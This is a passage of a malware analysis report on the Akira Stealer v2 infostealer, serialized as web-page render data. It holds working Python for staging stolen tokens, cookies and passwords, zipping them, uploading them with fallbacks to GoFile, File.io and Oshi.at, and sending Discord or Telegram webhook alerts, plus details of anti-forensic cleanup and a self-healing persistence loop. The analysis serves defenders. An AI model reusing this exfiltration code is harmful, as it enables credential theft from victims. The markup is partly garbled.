temp_folder\n\n# Upload & Notify\nakira.sendFilesTG(Utils.get_temp_folder(), startup)\nhook.sendFilesTG(Utils.get_temp_folder(), startup)\n",[63,17492,17493,17498,17503,17507,17512,17517],{"__ignoreMap":65},[102,17494,17495],{"class":104,"line":105},[102,17496,17497],{},"# 
Archive\n",[102,17499,17500],{"class":104,"line":111},[102,17501,17502],{},"Utils.zip_client_file()  # creates CLIENT.zip from temp_folder\n",[102,17504,17505],{"class":104,"line":329},[102,17506,11519],{"emptyLinePlaceholder":2181},[102,17508,17509],{"class":104,"line":346},[102,17510,17511],{},"# Upload & Notify\n",[102,17513,17514],{"class":104,"line":650},[102,17515,17516],{},"akira.sendFilesTG(Utils.get_temp_folder(), startup)\n",[102,17518,17519],{"class":104,"line":656},[102,17520,17521],{},"hook.sendFilesTG(Utils.get_temp_folder(), startup)\n",[1254,17523,17524,17539],{},[1257,17525,17526,17531,17532,805,17534,805,17536,11558],{},[251,17527,17528],{},[63,17529,17530],{},"zip_client_file()",": Compresses the entire temp directory, including ",[63,17533,15933],{},[63,17535,13987],{},[63,17537,17538],{},"Passwords",[1257,17540,17541,17545,17546],{},[251,17542,17543],{},[63,17544,16709],{},": Posts the download link via Telegram or Discord webhook, listing each stolen filename:",[56,17547,17549],{"className":12155,"code":17548,"language":12157,"meta":65,"style":65},"fields.append({\n\"name\": \"📂 Files\",\n\"value\": \"`\" + \"\\n\".join(data.stolen_files) + \"`\",\n\"inline\": False\n})\n",[63,17550,17551,17556,17561,17566,17571],{"__ignoreMap":65},[102,17552,17553],{"class":104,"line":105},[102,17554,17555],{},"fields.append({\n",[102,17557,17558],{"class":104,"line":111},[102,17559,17560],{},"\"name\": \"📂 Files\",\n",[102,17562,17563],{"class":104,"line":329},[102,17564,17565],{},"\"value\": \"`\" + \"\\n\".join(data.stolen_files) + \"`\",\n",[102,17567,17568],{"class":104,"line":346},[102,17569,17570],{},"\"inline\": False\n",[102,17572,17573],{"class":104,"line":650},[102,17574,17575],{},"})\n",[12,17577,17578],{},[251,17579,17580],{},"Conclusion:",[12,17582,17583],{},"The File Grabber in Akira Stealer v2 systematically hunts for sensitive documents using keyword and extension filters, respects a 2 MB size cap for efficiency, and consolidates stolen items 
into an archive. Its design ensures both breadth (multiple folders) and precision (targeted filters), making it one of the most impactful stages of the malware’s lifecycle.",[41,17585,17587],{"id":17586},"_712-exfiltration-strategy","7.12 Exfiltration Strategy",[12,17589,47],{},[12,17591,17592],{},"The exfiltration module handles harvested tokens and additional artifacts (cookies, autofills, logs) by staging them in a structured directory, compressing into an archive, uploading to multiple online file hosts, and sending detailed webhook notifications. This section deconstructs each step with file paths, domain endpoints, and code references for full traceability.",[186,17594,17596],{"id":17595},"_7121-directory-layout-filenames","7.12.1 Directory Layout & Filenames",[12,17598,192],{},[12,17600,17601],{},"Akira organizes all collected artifacts into a clean and hierarchical temporary directory structure. This design allows for efficient packaging and easy post-exfiltration review by the attacker. Each data category—such as Tokens, Cookies, Passwords, or Screenshots—is stored in its own subfolder under a root path named after the victim’s computer (e.g., DESKTOP1234). This structured layout ensures clarity, minimizes duplication, and streamlines the archiving and upload process. It also makes automated parsing or manual inspection much easier on the attacker side.",[56,17603,17606],{"className":17604,"code":17605,"language":61},[59],"C:\\Users\\User\\AppData\\Local\\Temp\\DESKTOP1234\\\n├─ Tokens\\\n│   ├ token_ab12cd34.txt\n│   └ token_ef56gh78.txt\n├─ Cookies\\\n│   ├ Chrome_Cookies.txt\n│   └ Discord_Cookies.txt\n├─ Autofill\\\n├─ Passwords\\\n├─ Logs\\\n└─ Screenshots\\\n",[63,17607,17605],{"__ignoreMap":65},[186,17609,17611],{"id":17610},"_7122-token-artifact-staging","7.12.2 Token & Artifact Staging",[12,17613,192],{},[12,17615,17616],{},"Before exfiltration, Akira stages all relevant artifacts in the corresponding subfolders. 
Token values, for instance, are written into individual .txt files to facilitate quick scanning and validation. Cookies, autofill entries, and passwords are similarly written into structured text files named by browser. This step standardizes the data layout, enabling automated tooling to track what was harvested. It also ensures that the zip archive later reflects a predictable and attacker-friendly format, regardless of which modules were triggered.",[56,17618,17620],{"className":12155,"code":17619,"language":12157,"meta":65,"style":65},"import os, shutil\n# Constants\nTMP = os.getenv('TEMP')\nROOT = os.path.join(TMP, os.getenv('COMPUTERNAME'))\n# Prepare structure\nfor sub in ['Tokens','Cookies','Autofill','Passwords','Logs','Screenshots']:\n    os.makedirs(os.path.join(ROOT, sub), exist_ok=True)\n# Save token\nwith open(os.path.join(ROOT, 'Tokens', f'token_{token[:8]}.txt'), 'w') as f:\n    f.write(token)\n",[63,17621,17622,17627,17632,17637,17642,17647,17652,17657,17662,17667],{"__ignoreMap":65},[102,17623,17624],{"class":104,"line":105},[102,17625,17626],{},"import os, shutil\n",[102,17628,17629],{"class":104,"line":111},[102,17630,17631],{},"# Constants\n",[102,17633,17634],{"class":104,"line":329},[102,17635,17636],{},"TMP = os.getenv('TEMP')\n",[102,17638,17639],{"class":104,"line":346},[102,17640,17641],{},"ROOT = os.path.join(TMP, os.getenv('COMPUTERNAME'))\n",[102,17643,17644],{"class":104,"line":650},[102,17645,17646],{},"# Prepare structure\n",[102,17648,17649],{"class":104,"line":656},[102,17650,17651],{},"for sub in ['Tokens','Cookies','Autofill','Passwords','Logs','Screenshots']:\n",[102,17653,17654],{"class":104,"line":662},[102,17655,17656],{},"    os.makedirs(os.path.join(ROOT, sub), exist_ok=True)\n",[102,17658,17659],{"class":104,"line":668},[102,17660,17661],{},"# Save token\n",[102,17663,17664],{"class":104,"line":674},[102,17665,17666],{},"with open(os.path.join(ROOT, 'Tokens', f'token_{token[:8]}.txt'), 'w') as 
f:\n",[102,17668,17669],{"class":104,"line":680},[102,17670,17671],{},"    f.write(token)\n",[1254,17673,17674,17677],{},[1257,17675,17676],{},"Tokens saved in separate small text files for quick inspection.",[1257,17678,17679,17680,17683,17684,1013],{},"Cookie dumps from ",[63,17681,17682],{},"Chromium.GetCookies()"," written to ",[63,17685,17686],{},"{Browser}_Cookies.txt",[186,17688,17690],{"id":17689},"_7133-zip-archive-creation","7.13.3 ZIP Archive Creation",[12,17692,192],{},[12,17694,17695,17696],{},"Once staging is complete, Akira compresses the entire directory into a single ZIP archive. The archive filename follows a consistent naming convention: ",[17697,17698,17699,17700],"computer-name",{},"_",[17701,17702,17703],"timestamp",{},".zip, using the host’s machine name and a UTC timestamp in ISO 8601 format. This ensures both uniqueness and chronological traceability. By walking the entire staging directory recursively, every file is preserved in its relative structure within the ZIP. 
This format simplifies bulk retrieval and inspection by attackers, especially if hundreds of victims are compromised in parallel.",[56,17705,17707],{"className":12155,"code":17706,"language":12157,"meta":65,"style":65},"import zipfile, datetime\n\ndef create_archive(root_dir: str) -> str:\n    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n    with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:\n        for dirpath, _, files in os.walk(root_dir):\n            for fname in files:\n                full = os.path.join(dirpath, fname)\n                rel = os.path.relpath(full, root_dir)\n                zf.write(full, rel)\n    return zip_path\n",[63,17708,17709,17714,17718,17723,17728,17733,17738,17743,17748,17753,17758,17763,17768],{"__ignoreMap":65},[102,17710,17711],{"class":104,"line":105},[102,17712,17713],{},"import zipfile, datetime\n",[102,17715,17716],{"class":104,"line":111},[102,17717,11519],{"emptyLinePlaceholder":2181},[102,17719,17720],{"class":104,"line":329},[102,17721,17722],{},"def create_archive(root_dir: str) -> str:\n",[102,17724,17725],{"class":104,"line":346},[102,17726,17727],{},"    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n",[102,17729,17730],{"class":104,"line":650},[102,17731,17732],{},"    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n",[102,17734,17735],{"class":104,"line":656},[102,17736,17737],{},"    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n",[102,17739,17740],{"class":104,"line":662},[102,17741,17742],{},"    with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:\n",[102,17744,17745],{"class":104,"line":668},[102,17746,17747],{},"        for dirpath, _, files in os.walk(root_dir):\n",[102,17749,17750],{"class":104,"line":674},[102,17751,17752],{},"            for fname in 
files:\n",[102,17754,17755],{"class":104,"line":680},[102,17756,17757],{},"                full = os.path.join(dirpath, fname)\n",[102,17759,17760],{"class":104,"line":12692},[102,17761,17762],{},"                rel = os.path.relpath(full, root_dir)\n",[102,17764,17765],{"class":104,"line":12698},[102,17766,17767],{},"                zf.write(full, rel)\n",[102,17769,17770],{"class":104,"line":12704},[102,17771,17772],{},"    return zip_path\n",[1254,17774,17775],{},[1257,17776,17777,17778,17781],{},"Archive named ",[63,17779,17780],{},"DESKTOP1234_20250505T123456Z.zip"," for host coherence.",[12,17783,17784],{},[251,17785,17786],{},"ZIP Filename Convention",[12,17788,17789],{},"The archive is named using the compromised host’s computer name followed by a UTC timestamp in ISO format, ensuring uniqueness and chronological order.",[56,17791,17793],{"className":12155,"code":17792,"language":12157,"meta":65,"style":65},"import datetime, os\n\ndef create_archive(root_dir: str) -> str:\n    # Generate UTC timestamp in YYYYMMDDThhmmssZ format\n    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n    # Construct ZIP filename: \u003CComputerName>_\u003CTimestamp>.zip\n    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n    return zip_path\n",[63,17794,17795,17800,17804,17808,17813,17817,17822,17826,17830],{"__ignoreMap":65},[102,17796,17797],{"class":104,"line":105},[102,17798,17799],{},"import datetime, os\n",[102,17801,17802],{"class":104,"line":111},[102,17803,11519],{"emptyLinePlaceholder":2181},[102,17805,17806],{"class":104,"line":329},[102,17807,17722],{},[102,17809,17810],{"class":104,"line":346},[102,17811,17812],{},"    # Generate UTC timestamp in YYYYMMDDThhmmssZ format\n",[102,17814,17815],{"class":104,"line":650},[102,17816,17727],{},[102,17818,17819],{"class":104,"line":656},[102,17820,17821],{},"    # Construct ZIP filename: 
\u003CComputerName>_\u003CTimestamp>.zip\n",[102,17823,17824],{"class":104,"line":662},[102,17825,17732],{},[102,17827,17828],{"class":104,"line":668},[102,17829,17737],{},[102,17831,17832],{"class":104,"line":674},[102,17833,17772],{},[12,17835,17789],{},[186,17837,17839],{"id":17838},"_7144-upload-workflow","7.14.4 Upload Workflow",[12,17841,192],{},[12,17843,17844],{},"Akira uses a three-tier upload strategy to maximize the chance of successful data exfiltration. It first attempts to upload the archive to GoFile.io using their public API, which returns a download link. If GoFile is unavailable or blocked, it falls back to File.io and then Oshi.at, ensuring the data is always transferred. These services provide anonymous, short-lived hosting, which makes takedown and traceability difficult. The script captures the final download URL and prepares it for webhook delivery.",[3259,17846,17847,17879,17906],{},[1257,17848,17849,17852],{},[251,17850,17851],{},"Primary: GoFile.io",[1254,17853,17854,17862,17870],{},[1257,17855,17856,1061,17859],{},[251,17857,17858],{},"API to fetch servers",[63,17860,17861],{},"GET https://api.gofile.io/servers",[1257,17863,17864,1061,17867],{},[251,17865,17866],{},"Upload endpoint",[63,17868,17869],{},"POST https://\u003Cserver>.gofile.io/contents/uploadfile",[1257,17871,17872,1061,17875,17878],{},[251,17873,17874],{},"Response field",[63,17876,17877],{},"data.downloadPage"," contains final URL.",[1257,17880,17881,17884],{},[251,17882,17883],{},"Fallback #1: File.io",[1254,17885,17886,17896],{},[1257,17887,17888,1061,17890,8957,17893],{},[251,17889,17866],{},[63,17891,17892],{},"POST https://file.io/",[63,17894,17895],{},"files={'file': open(...)}",[1257,17897,17898,17901,17902,17905],{},[251,17899,17900],{},"Response",": JSON ",[63,17903,17904],{},"link"," field.",[1257,17907,17908,17911],{},[251,17909,17910],{},"Fallback #2: 
Oshi.at",[1254,17912,17913,17927],{},[1257,17914,17915,1061,17917,8957,17920,17923,17924,1013],{},[251,17916,17866],{},[63,17918,17919],{},"POST http://oshi.at/",[63,17921,17922],{},"files[]"," and parameters ",[63,17925,17926],{},"expire=43200, autodestroy=0",[1257,17928,17929,17931,17932,1013],{},[251,17930,17900],{},": Plain text containing ",[63,17933,17934],{},"DL: \u003Curl>",[12,17936,17937],{},[251,17938,17939],{},"Implementation Snippet:",[56,17941,17943],{"className":12155,"code":17942,"language":12157,"meta":65,"style":65},"import requests\n\ndef upload_with_fallback(zip_path):\n    # GoFile\n    try:\n        servers = requests.get('https://api.gofile.io/servers', timeout=10).json()['data']['servers']\n        for srv in servers:\n            try:\n                r = requests.post(\n                    f'https://{srv}.gofile.io/contents/uploadfile',\n                    files={'file': open(zip_path,'rb')}, timeout=20)\n                url = r.json()['data']['downloadPage']\n                if url: return url\n            except: continue\n    except: pass\n    # File.io\n    try:\n        r = requests.post('https://file.io/', files={'file': open(zip_path,'rb')}, timeout=20)\n        return r.json().get('link','')\n    except: pass\n    # Oshi.at\n    try:\n        text = requests.post('http://oshi.at/', files={'files[]': open(zip_path,'rb')}, data={'expire':'43200'}).text\n        return text.split('DL: ')[1].strip()\n    except: pass\n    return ''\n",[63,17944,17945,17950,17954,17959,17964,17968,17973,17978,17983,17988,17993,17998,18003,18008,18013,18018,18023,18027,18032,18037,18041,18046,18050,18055,18060,18064],{"__ignoreMap":65},[102,17946,17947],{"class":104,"line":105},[102,17948,17949],{},"import requests\n",[102,17951,17952],{"class":104,"line":111},[102,17953,11519],{"emptyLinePlaceholder":2181},[102,17955,17956],{"class":104,"line":329},[102,17957,17958],{},"def 
upload_with_fallback(zip_path):\n",[102,17960,17961],{"class":104,"line":346},[102,17962,17963],{},"    # GoFile\n",[102,17965,17966],{"class":104,"line":650},[102,17967,12807],{},[102,17969,17970],{"class":104,"line":656},[102,17971,17972],{},"        servers = requests.get('https://api.gofile.io/servers', timeout=10).json()['data']['servers']\n",[102,17974,17975],{"class":104,"line":662},[102,17976,17977],{},"        for srv in servers:\n",[102,17979,17980],{"class":104,"line":668},[102,17981,17982],{},"            try:\n",[102,17984,17985],{"class":104,"line":674},[102,17986,17987],{},"                r = requests.post(\n",[102,17989,17990],{"class":104,"line":680},[102,17991,17992],{},"                    f'https://{srv}.gofile.io/contents/uploadfile',\n",[102,17994,17995],{"class":104,"line":12692},[102,17996,17997],{},"                    files={'file': open(zip_path,'rb')}, timeout=20)\n",[102,17999,18000],{"class":104,"line":12698},[102,18001,18002],{},"                url = r.json()['data']['downloadPage']\n",[102,18004,18005],{"class":104,"line":12704},[102,18006,18007],{},"                if url: return url\n",[102,18009,18010],{"class":104,"line":12710},[102,18011,18012],{},"            except: continue\n",[102,18014,18015],{"class":104,"line":12716},[102,18016,18017],{},"    except: pass\n",[102,18019,18020],{"class":104,"line":12722},[102,18021,18022],{},"    # File.io\n",[102,18024,18025],{"class":104,"line":12728},[102,18026,12807],{},[102,18028,18029],{"class":104,"line":12734},[102,18030,18031],{},"        r = requests.post('https://file.io/', files={'file': open(zip_path,'rb')}, timeout=20)\n",[102,18033,18034],{"class":104,"line":12740},[102,18035,18036],{},"        return r.json().get('link','')\n",[102,18038,18039],{"class":104,"line":12746},[102,18040,18017],{},[102,18042,18043],{"class":104,"line":12752},[102,18044,18045],{},"    # 
Oshi.at\n",[102,18047,18048],{"class":104,"line":12758},[102,18049,12807],{},[102,18051,18052],{"class":104,"line":12764},[102,18053,18054],{},"        text = requests.post('http://oshi.at/', files={'files[]': open(zip_path,'rb')}, data={'expire':'43200'}).text\n",[102,18056,18057],{"class":104,"line":12770},[102,18058,18059],{},"        return text.split('DL: ')[1].strip()\n",[102,18061,18062],{"class":104,"line":12776},[102,18063,18017],{},[102,18065,18066],{"class":104,"line":13442},[102,18067,18068],{},"    return ''\n",[186,18070,18072],{"id":18071},"_7155-webhook-alerts-attacker-retrieval-analyst-visibility-limits","7.15.5 Webhook Alerts, Attacker Retrieval & Analyst Visibility Limits",[12,18074,192],{},[12,18076,18077],{},"After uploading the ZIP archive, Akira sends a webhook notification—typically to Discord or Telegram—with a structured embed containing detailed information: number of stolen tokens, cookie count, file size, and a clickable download link. This gives attackers immediate feedback and retrieval access. To ensure reliability, a plaintext fallback message is also sent, containing just the archive link. This redundancy guarantees delivery, even if the embed is blocked by the platform or filtered. 
From the defender’s perspective, these communications are often invisible unless outbound network monitoring is in place.",[12,18079,18080],{},[251,18081,18082],{},"Embed Notification",[56,18084,18086],{"className":12155,"code":18085,"language":12157,"meta":65,"style":65},"# Build embed with key metadata\ntoken_count = len(os.listdir(os.path.join(ROOT, 'Tokens')))\nfields = [\n    {'name':'🗂️ Archive','value':f'[Download Archive]({download_url})','inline':False},\n    {'name':'📐 Size','value':f'{os.path.getsize(zip_path)//1024} KB','inline':True},\n    {'name':'🔑 Tokens','value':str(token_count),'inline':True},\n    {'name':'🍪 Cookies','value':str(data.cookie_count),'inline':True},\n    {'name':'🔐 Passwords','value':str(data.password_count),'inline':True},\n]\npayload = {\n    'username':'Akira 💊',\n    'embeds':[{'title':'🗄️ Exfiltration Complete','fields':fields}]\n}\nrequests.post(webhook_url, json=payload, timeout=8)\n",[63,18087,18088,18093,18098,18103,18108,18113,18118,18123,18128,18132,18137,18142,18147,18151],{"__ignoreMap":65},[102,18089,18090],{"class":104,"line":105},[102,18091,18092],{},"# Build embed with key metadata\n",[102,18094,18095],{"class":104,"line":111},[102,18096,18097],{},"token_count = len(os.listdir(os.path.join(ROOT, 'Tokens')))\n",[102,18099,18100],{"class":104,"line":329},[102,18101,18102],{},"fields = [\n",[102,18104,18105],{"class":104,"line":346},[102,18106,18107],{},"    {'name':'🗂️ Archive','value':f'[Download Archive]({download_url})','inline':False},\n",[102,18109,18110],{"class":104,"line":650},[102,18111,18112],{},"    {'name':'📐 Size','value':f'{os.path.getsize(zip_path)//1024} KB','inline':True},\n",[102,18114,18115],{"class":104,"line":656},[102,18116,18117],{},"    {'name':'🔑 Tokens','value':str(token_count),'inline':True},\n",[102,18119,18120],{"class":104,"line":662},[102,18121,18122],{},"    {'name':'🍪 
Cookies','value':str(data.cookie_count),'inline':True},\n",[102,18124,18125],{"class":104,"line":668},[102,18126,18127],{},"    {'name':'🔐 Passwords','value':str(data.password_count),'inline':True},\n",[102,18129,18130],{"class":104,"line":674},[102,18131,15585],{},[102,18133,18134],{"class":104,"line":680},[102,18135,18136],{},"payload = {\n",[102,18138,18139],{"class":104,"line":12692},[102,18140,18141],{},"    'username':'Akira 💊',\n",[102,18143,18144],{"class":104,"line":12698},[102,18145,18146],{},"    'embeds':[{'title':'🗄️ Exfiltration Complete','fields':fields}]\n",[102,18148,18149],{"class":104,"line":12704},[102,18150,10086],{},[102,18152,18153],{"class":104,"line":12710},[102,18154,18155],{},"requests.post(webhook_url, json=payload, timeout=8)\n",[1254,18157,18158,18164],{},[1257,18159,18160,18163],{},[251,18161,18162],{},"Delivery",": Sent to the attacker’s Discord/Telegram channel.",[1257,18165,18166,18169,18170,18173],{},[251,18167,18168],{},"Embed Link",": Contains a clickable ",[63,18171,18172],{},"download_url"," pointing to the ZIP on GoFile (or fallback host).",[12,18175,18176],{},[251,18177,18178],{},"Raw Link Fallback",[56,18180,18182],{"className":12155,"code":18181,"language":12157,"meta":65,"style":65},"# Ensure attacker always has direct URL, even if embeds fail\nmessage = f\"📥 Archive available at: {download_url}\"\nrequests.post(webhook_url, data={'message': message}, timeout=8)\n",[63,18183,18184,18189,18194],{"__ignoreMap":65},[102,18185,18186],{"class":104,"line":105},[102,18187,18188],{},"# Ensure attacker always has direct URL, even if embeds fail\n",[102,18190,18191],{"class":104,"line":111},[102,18192,18193],{},"message = f\"📥 Archive available at: {download_url}\"\n",[102,18195,18196],{"class":104,"line":329},[102,18197,18198],{},"requests.post(webhook_url, data={'message': message}, timeout=8)\n",[1254,18200,18201],{},[1257,18202,18203,18206],{},[251,18204,18205],{},"Plain Text",": Guarantees delivery of the link in case embeds 
are blocked or silently dropped.",[12,18208,18209],{},[251,18210,18211],{},"How the Attacker Retrieves the Link",[12,18213,18214,18217],{},[251,18215,18216],{},"1. Webhook Infrastructure","\nThe attacker embeds the webhook endpoint in the malware configuration:",[56,18219,18221],{"className":12155,"code":18220,"language":12157,"meta":65,"style":65},"# at class initialization\nself.default_webhook = \"%DISCORD_OR_TG_WEBHOOK_URL%\"\n",[63,18222,18223,18228],{"__ignoreMap":65},[102,18224,18225],{"class":104,"line":105},[102,18226,18227],{},"# at class initialization\n",[102,18229,18230],{"class":104,"line":111},[102,18231,18232],{},"self.default_webhook = \"%DISCORD_OR_TG_WEBHOOK_URL%\"\n",[1254,18234,18235,18242],{},[1257,18236,18237,1061,18239],{},[251,18238,9018],{},[63,18240,18241],{},"https://discord.com/api/webhooks/\u003CWEBHOOK_ID>/\u003CWEBHOOK_TOKEN>",[1257,18243,18244,1061,18247],{},[251,18245,18246],{},"Telegram",[63,18248,18249],{},"https://api.telegram.org/bot\u003CTELEGRAM_TOKEN>/sendMessage",[12,18251,18252,18255],{},[251,18253,18254],{},"2. 
Real-Time Delivery","\nImmediately after a successful file upload, the malware executes:",[56,18257,18259],{"className":12155,"code":18258,"language":12157,"meta":65,"style":65},"payload = {\n  'username': 'Akira 💊',\n  'embeds': [{\n      'title': '🗄️ Exfiltration Complete',\n      'fields': [\n          {'name': '🗂️ Archive', 'value': f'[Download ZIP]({download_url})'}\n      ]\n  }]\n}\n# Transmit the archive URL entirely in the JSON body\nrequests.post(self.default_webhook, json=payload, timeout=8)\n",[63,18260,18261,18265,18270,18275,18280,18285,18290,18295,18300,18304,18309],{"__ignoreMap":65},[102,18262,18263],{"class":104,"line":105},[102,18264,18136],{},[102,18266,18267],{"class":104,"line":111},[102,18268,18269],{},"  'username': 'Akira 💊',\n",[102,18271,18272],{"class":104,"line":329},[102,18273,18274],{},"  'embeds': [{\n",[102,18276,18277],{"class":104,"line":346},[102,18278,18279],{},"      'title': '🗄️ Exfiltration Complete',\n",[102,18281,18282],{"class":104,"line":650},[102,18283,18284],{},"      'fields': [\n",[102,18286,18287],{"class":104,"line":656},[102,18288,18289],{},"          {'name': '🗂️ Archive', 'value': f'[Download ZIP]({download_url})'}\n",[102,18291,18292],{"class":104,"line":662},[102,18293,18294],{},"      ]\n",[102,18296,18297],{"class":104,"line":668},[102,18298,18299],{},"  }]\n",[102,18301,18302],{"class":104,"line":674},[102,18303,10086],{},[102,18305,18306],{"class":104,"line":680},[102,18307,18308],{},"# Transmit the archive URL entirely in the JSON body\n",[102,18310,18311],{"class":104,"line":12692},[102,18312,18313],{},"requests.post(self.default_webhook, json=payload, timeout=8)\n",[1254,18315,18316,18324],{},[1257,18317,399,18318,18320,18321,1013],{},[63,18319,18172],{}," variable is interpolated into the embed’s ",[63,18322,18323],{},"fields.value",[1257,18325,18326,18327,18329,18330,9890],{},"For Telegram fallback, the ",[63,18328,18172],{}," appears in the plain-text 
",[63,18331,2233],{},[12,18333,18334],{},[251,18335,18336],{},"3. EDR & Forensic Visibility Limitations",[1254,18338,18339,18348],{},[1257,18340,18341,18344,18345,18347],{},[251,18342,18343],{},"No Local Logging",": The malware does not write the ",[63,18346,18172],{}," to disk or system logs.",[1257,18349,18350,18353],{},[251,18351,18352],{},"EDR Blind Spots",": Tools like Microsoft Defender for Endpoint may flag the HTTP request attempt but cannot extract the embedded URL.",[12,18355,18356],{},[251,18357,18358],{},"4. Why the Analyst Cannot Recover This Locally:",[1254,18360,18361,18374,18393],{},[1257,18362,18363,18366,18367,18369,18370,18373],{},[251,18364,18365],{},"No Local Copy of Link",": The malware writes the ",[63,18368,18172],{}," only in memory and transmits it over the network; it does ",[3456,18371,18372],{},"not"," save this URL to disk or logs.",[1257,18375,18376,18379,18380,18382,1297,18387,18389,18390,1013],{},[251,18377,18378],{},"Ephemeral Staging Cleanup",": Immediately after upload, the code executes:",[531,18381],{},[102,18383,18386],{"className":18384},[18385],"text-monospace","shutil.rmtree(ROOT)",[531,18388],{},"\nerasing all staged artifacts (including any transient text files) from ",[63,18391,18392],{},"%TEMP%",[1257,18394,18395,18398,18399,18402],{},[251,18396,18397],{},"Network-Only Transmission",": Webhook calls (",[63,18400,18401],{},"requests.post",") occur in-memory; no HTTP logs or browser history entries are created on the victim machine.",[2110,18404,18405],{},[12,18406,18407,18410,18411,18413,18414,18416],{},[251,18408,18409],{},"Implication for Analysts:","\nWithout live packet capture (e.g., network TAP or proxy) at the time of execution, the exact ",[63,18412,18172],{}," is unrecoverable post-infection.\nAdditionally, the exfiltrated archive is auto-deleted from the hosting service, further reducing the window for forensic retrieval.\nPost-infection imaging or host-based forensic recovery will ",[3456,18415,18372],{}," 
reveal the attacker’s URL or file host credentials, as no artifacts remain locally.",[52,18418],{"className":18419},[8535,8536],[41,18421,18423],{"id":18422},"_713-conclusion","7.13 Conclusion",[12,18425,47],{},[12,18427,18428,18430],{},[63,18429,8304],{}," (Akira Stealer v2) is a comprehensive, commercially distributed stealer toolkit. It combines extensive targeting, sophisticated anti-analysis, dynamic infrastructure control, and full-stack data theft across credentials, crypto, system profiling, and user files. Its modularity and stealth, combined with rapid reinfection methods, make it one of the most technically advanced stealers observed in active deployment.",[25,18432,18434],{"id":18433},"_8-circular-execution-chain-a-self-healing-loop","8. Circular Execution Chain: A Self-Healing Loop",[12,18436,31],{},[12,18438,18439,18440,18443],{},"One of the most technically sophisticated elements of this campaign is its regenerative, circular execution model. Unlike conventional malware with linear stages that flow from dropper to payload and then vanish, this operation was engineered like a ",[251,18441,18442],{},"closed loop"," — where every component watches over the others.",[12,18445,18446,18447,18450],{},"This ",[251,18448,18449],{},"self-healing architecture"," made the infection chain not only persistent, but also autonomous. It could fully recover from partial removals. As long as one piece remained alive, the entire malware ecosystem could reassemble itself.",[41,18452,18454],{"id":18453},"_81-behavioral-breakdown","8.1 Behavioral Breakdown",[12,18456,47],{},[3259,18458,18459,18485,18498,18529,18547],{},[1257,18460,18461,18466,18468,18469,18472,18473,18475,18476,18478,18479,18481,18482,18484],{},[251,18462,18463,18464,1288],{},"Persistence Anchor (",[63,18465,8296],{},[63,18467,8296],{}," acts as the foundational foothold. 
It is typically dropped into a Windows user startup location, such as ",[63,18470,18471],{},"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup",", or registered via ",[63,18474,9343],{},". Its job is simple but critical: ensure ",[63,18477,8300],{}," is present and launch it silently during user logon. If ",[63,18480,8300],{}," is missing, it re-extracts the archive ",[63,18483,9509],{}," (located in a temp folder or dropped anew), regenerating the full Electron app structure.",[1257,18486,18487,18492,18494,18495,18497],{},[251,18488,18489,18490,1288],{},"Bridge Loader (",[63,18491,8300],{},[63,18493,8300],{}," is the Electron-wrapped Node.js application. It doesn’t expose any GUI and operates entirely in the background. Upon execution, it runs the embedded JavaScript logic within ",[63,18496,8749],{},", using Node.js as a runtime environment. This abstraction layer decouples the core logic from the PE stub, helping to evade traditional analysis.",[1257,18499,18500,18505,18506,18508,18509],{},[251,18501,18502,18503,1288],{},"Execution Orchestrator (",[63,18504,10485],{},"\nEmbedded within ",[63,18507,8749],{},", this is the true controller of the infection chain. Its key functions include:",[1254,18510,18511,18517,18520],{},[1257,18512,18513,18514,18516],{},"Checking for the presence of ",[63,18515,8296],{}," and redeploying it if missing",[1257,18518,18519],{},"Dynamically injecting runtime configuration: webhook URLs, C2 addresses, tokens",[1257,18521,18522,18523,18525,18526,18528],{},"Either invoking the already-present Python payload (",[63,18524,8304],{},") or downloading it as part of a ZIP bundle (e.g., ",[63,18527,10549],{},") from attacker-controlled infrastructure",[1257,18530,18531,18536,18537,18539,18540,18542,18543,18546],{},[251,18532,18533,18534,1288],{},"Payload Execution (",[63,18535,8304],{},"\nOnce triggered, ",[63,18538,8304],{}," executes in memory via ",[63,18541,8276],{},". 
It systematically collects saved credentials, cookies, Discord tokens, browser session data, and cryptocurrency wallet extensions. The data is staged in a ZIP archive and exfiltrated via HTTPS — commonly to Discord webhooks, but fallback APIs like ",[63,18544,18545],{},"gofile.io"," or custom C2 endpoints have also been observed.",[1257,18548,18549,18552,18553,18555,18556,18558,18559,18561,18562,18564,18565,18567],{},[251,18550,18551],{},"Loop Integrity and Self-Healing","\nThe design is circular. If ",[63,18554,8296],{}," is deleted, it will be redeployed. If ",[63,18557,8300],{}," is missing, ",[63,18560,8296],{}," re-extracts it from ",[63,18563,9509],{},". If ",[63,18566,8304],{}," is deleted, it is re-obtained by the JavaScript layer. This interdependency makes the malware resilient and capable of reconstructing its execution chain from virtually any surviving fragment.",[12,18569,18570,18571,18574],{},"This architecture is not just modular — it’s ",[251,18572,18573],{},"self-sustaining",", deliberately engineered for stealth, flexibility, and long-term survivability in target environments.",[41,18576,18578],{"id":18577},"_82-why-this-is-noteworthy","8.2 Why This Is Noteworthy",[12,18580,47],{},[12,18582,18583,18584,1013],{},"The campaign’s architectural design reflects a level of sophistication not typically seen in commodity infostealers. It goes beyond simple multi-stage loaders — this is malware engineered for ",[251,18585,18586],{},"operational resilience, stealth, and automation",[12,18588,18589],{},[251,18590,18591],{},"Key Characteristics",[1254,18593,18594,18600,18637,18657],{},[1257,18595,18596,18599],{},[251,18597,18598],{},"Full Autonomy","\nOnce deployed, the malware requires no user interaction or external reactivation. 
